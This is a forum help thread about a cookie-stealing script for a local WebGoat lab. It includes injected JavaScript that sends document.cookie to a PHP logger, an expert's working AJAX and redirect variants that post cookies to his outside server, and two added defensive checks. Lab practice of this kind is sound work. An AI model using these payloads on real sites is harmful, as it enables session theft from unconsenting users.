Solved

How to call a PHP script from Javascript in HTML

Posted on 2014-11-16
Last Modified: 2014-11-18
Hello experts,
 
  I'm trying to construct a basic cookie stealer.  I have Javascript in an HTML doc that calls a PHP file and passes it the value of the session cookie.  Now, I'm able to run the PHP file by itself and it creates the specified file, but when I open the basic HTML doc I only see the text of the PHP file in the browser window, and no text file is written in the PHP dir.  I've been scratching my head for a few hours this morning and am not sure what I'm doing wrong.  I've tried both var assignment and properties such as document.location in the HTML file:

HTML doc:
<script language="Javascript">
 document.location = "http://localhost:8080/WebGoat/cookiestealer.php?cookie=" + escape(document.cookie);
</script>


cookiestealer.php:
<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>


  This is probably something silly I'm overlooking.  Any ideas?
Question by:dilligent
13 Comments
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445772
We can't really see the sequence of events here, but it may be possible that things are running in an out-of-order sequence.  The PHP scripts are run on the server and are complete before the HTML document is transmitted to the client and the JavaScript gets control.  And some cookies are settable in ways that hide them from JavaScript completely. One possibility might be to use AJAX to send the stolen cookies back to the server.  But whatever you do with something like this, beware that you will likely offend people if you try to gain access to their personally identifiable information without their permission.  In some places, this is a criminal activity with penalties that involve handcuffs and prison time, so tread lightly and do not do this to any client who has not given you explicit permission.  To protect yourself, you should probably insist on written permission!
0
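
The comment above notes that some cookies can be set so that JavaScript cannot see them; that is the `HttpOnly` attribute. The following added example (not part of any participant's post) reports which cookies `document.cookie` would expose and which session-looking cookies lack `HttpOnly` or `Secure`. The `Set-Cookie` lines are constructed sample data and the function names are hypothetical.

```javascript
// Added example, not code from the thread. The Set-Cookie lines below are
// constructed sample data; the function names are hypothetical.
const sampleSetCookie = [
  "JSESSIONID=0123456789ABCDEF; Path=/WebGoat",
  "PHPSESSID=constructedvalue; Path=/; HttpOnly; Secure; SameSite=Lax",
  "lang=de; Path=/; Max-Age=3600",
];

// Split one Set-Cookie value into name, value and a lower-cased attribute map.
function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf("=");
    const key = (i < 0 ? a : a.slice(0, i)).toLowerCase();
    cookie.attrs[key] = i < 0 ? true : a.slice(i + 1);
  }
  return cookie;
}

// Cookies without HttpOnly are the ones a script on the page can read.
function scriptReadable(lines) {
  return lines.map(parseSetCookie).filter((c) => !c.attrs.httponly).map((c) => c.name);
}

// Report session-looking cookies that are missing HttpOnly or Secure.
function auditSessionCookies(lines) {
  const sessionName = /sess|sid|auth|token/i;
  return lines
    .map(parseSetCookie)
    .filter((c) => sessionName.test(c.name))
    .map((c) => ({
      name: c.name,
      missing: ["httponly", "secure"].filter((k) => !c.attrs[k]),
    }))
    .filter((r) => r.missing.length > 0);
}

console.log(scriptReadable(sampleSetCookie));
console.log(JSON.stringify(auditSessionCookies(sampleSetCookie)));
```
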
 

Author Comment

by:dilligent
ID: 40445777
This is all in my OWASP WebGoat install on my local VM.  I understand that I can use AJAX, but it was my understanding that my setup should steal my session cookie and write it to a file on my VM.
0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445784
For obvious reasons I am not going to leave these scripts on my server, but this tests out correctly.  Here is the server-side "Ajax" script:
<?php // demo/temp_dilligent_server.php
error_reporting(E_ALL);
date_default_timezone_set('America/Chicago');

// SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html

// START THE OUTPUT BUFFER TO CAPTURE THE var_dump() DISPLAY
ob_start();

// MAKE THE OUTPUT EASY TO READ
echo '<pre>';

// SEND BACK THE DATE...
echo date('r');
echo  PHP_EOL;

// ... AND THE GET-REQUEST VARIABLES
echo 'GET: ';
var_dump($_GET);

// ... AND THE POST-REQUEST VARIABLES
echo 'POST: ';
var_dump($_POST);

echo '</pre>';
echo  PHP_EOL;


And here is the client-side script that sends the data to the server.

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<!-- // SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>
$(document).ready(function(){
    /* GRAB ANY COOKIES THAT JAVASCRIPT CAN SEE */
    var cookies = escape(document.cookie);
    /* SEND THE COOKIES TO THE SERVER */
    $.post("temp_dilligent_server.php", {myArg:cookies}, function(response){
        $("#output p#target").html(response);
    });
});
</script>

<title>E-E Q_28563154</title>
</head>
<body>

<noscript>Unable to steal cookies: JavaScript is not enabled!</noscript>

<div   id="output">
   <p  id="static">HERE ARE THE STOLEN COOKIES</p>
   <p  id="target">This element gets the AJAX response</p>
</div>

</body>
</html>

0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445785
Let me see if I can get it to work with the document.location redirect.  If you haven't tried them, make a search for Google Dev Tools -- very helpful for things like this exercise.
0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 40445789
This worked for the front-end script and it echoed the appropriate data:
<script language="Javascript">
document.location = "http://iconoun.com/demo/temp_dilligent_server.php?cookie=" + escape(document.cookie);
</script>

Output:
Sun, 16 Nov 2014 09:52:05 -0600
GET: array(1) {
  ["cookie"]=>
  string(51) "lang=de; PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133"
}
POST: array(0) {
}

I don't see any material difference between your scripts and mine, so you might want to step through the data visualization process using alert() and echo.
0
 

Author Comment

by:dilligent
ID: 40445846
I don't know what to say.  I see the entry in my access logs, and I see via Dev Tools and Fiddler that the cookie is indeed passed.  The problem is that the PHP doc is treated as text and is not executed.  No file is written, no statements are echoed if the .php file is changed.

Remote Address:127.0.0.1:8080
Request URL:http://localhost:8080/WebGoat/cookiestealer.php?cookie=
Request Method:GET
Status Code:200 OK
Request Headers
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3
Host:localhost:8080
User-Agent:Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Query String Parameters
cookie:**********************
Response Headers
Accept-Ranges:bytes
Content-Length:174
Date:Sun, 16 Nov 2014 16:59:50 GMT
ETag:W/"174-1416157027159"
Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT
Server:Apache-Coyote/1.1
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 40445904
You can start with the fact that Chrome will not allow a cookie to be set on 'localhost'.  The reason is that 'localhost' is not a unique domain.  The same is true with any page loaded with 'file://'.

My cookie test pages seem to work in Chrome with an IP address thru my web server on this machine.
0
 

Author Comment

by:dilligent
ID: 40446024
Regardless of whether or not I execute from localhost or change the URL and execute from my host machine while pointing to the VM, I still get no PHP file execution, and instead just get a 200 (or 304 if I repeat without clearing cookies) with the literal response back:

<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 40446193
I copied your code and made adjustments for my web server and it works ok.  I think that you do not have PHP installed on your web server or at least not on the Apache-Coyote/1.1 part of it.
0
 

Author Comment

by:dilligent
ID: 40446223
Hmmm, so I need it installed on the app server itself, in addition to the app server box?  That is new to me, if so.  I'll look into this and get back to this question.
0
 
LVL 84

Accepted Solution

by:Dave Baldwin (earned 2000 total points)
ID: 40446279
Standard Apache installs have some extra code that tells them when to run PHP code thru the PHP interpreter; it is not automatic.  If PHP is already installed on the server, it's the part that tells the web server to use the PHP interpreter to run the PHP code that you need.
0
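
The diagnosis in the accepted solution can be checked against the response the asker posted: the body is raw PHP, and the weak ETag has the shape size-mtime, with both parts matching `Content-Length` and `Last-Modified`, which is what a server produces when it reads a file from disk instead of running it. The following added example (not part of any participant's post) performs that check; the header values and body are copied from the thread and the function names are hypothetical.

```javascript
// Added example, not code from the thread. Header values and body are copied
// from the responses posted above; the function names are hypothetical.
const postedHeaders = [
  "Accept-Ranges:bytes",
  "Content-Length:174",
  "Date:Sun, 16 Nov 2014 16:59:50 GMT",
  'ETag:W/"174-1416157027159"',
  "Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT",
  "Server:Apache-Coyote/1.1",
];
const postedBody = '<?php\n$file = fopen("cookie.txt","a");\n' +
  "fwrite($file, $_GET['cookie']);\nfclose($file);\n?>";

// Turn "Name:value" lines into a map keyed by lower-cased header name.
function parseHeaders(lines) {
  const h = {};
  for (const line of lines) {
    const i = line.indexOf(":");
    if (i > 0) h[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return h;
}

// Collect the signs that a response is a file read from disk, not script output.
function staticFileEvidence(headers, body) {
  const evidence = [];
  if (/<\?(php|=)/i.test(body)) evidence.push("php-source-in-body");
  if (headers["accept-ranges"] === "bytes") evidence.push("accept-ranges");
  // Weak ETag of the form W/"<size>-<mtime in ms>": compare both parts with the other headers.
  const m = /^W\/"(\d+)-(\d+)"$/.exec(headers["etag"] || "");
  if (m) {
    if (m[1] === headers["content-length"]) evidence.push("etag-size-matches-length");
    const mtime = Date.parse(headers["last-modified"] || "");
    if (Math.floor(Number(m[2]) / 1000) * 1000 === mtime) {
      evidence.push("etag-mtime-matches-last-modified");
    }
  }
  return evidence;
}

// Unexecuted PHP plus at least one static-file sign means the source is being disclosed.
function isSourceDisclosure(headers, body) {
  const e = staticFileEvidence(headers, body);
  return e.includes("php-source-in-body") && e.length > 1;
}

console.log(staticFileEvidence(parseHeaders(postedHeaders), postedBody));
```

On a server that is meant to run PHP, a positive result means any credentials or logic in the `.php` file are readable by every client, so the handler mapping should be fixed before the file is left in the web root.
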
 

Author Closing Comment

by:dilligent
ID: 40449925
Thank you.  I'll install PHP on my Tomcat instance, as I'm fairly certain that this is the problem.
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 40450659
You're welcome.
0
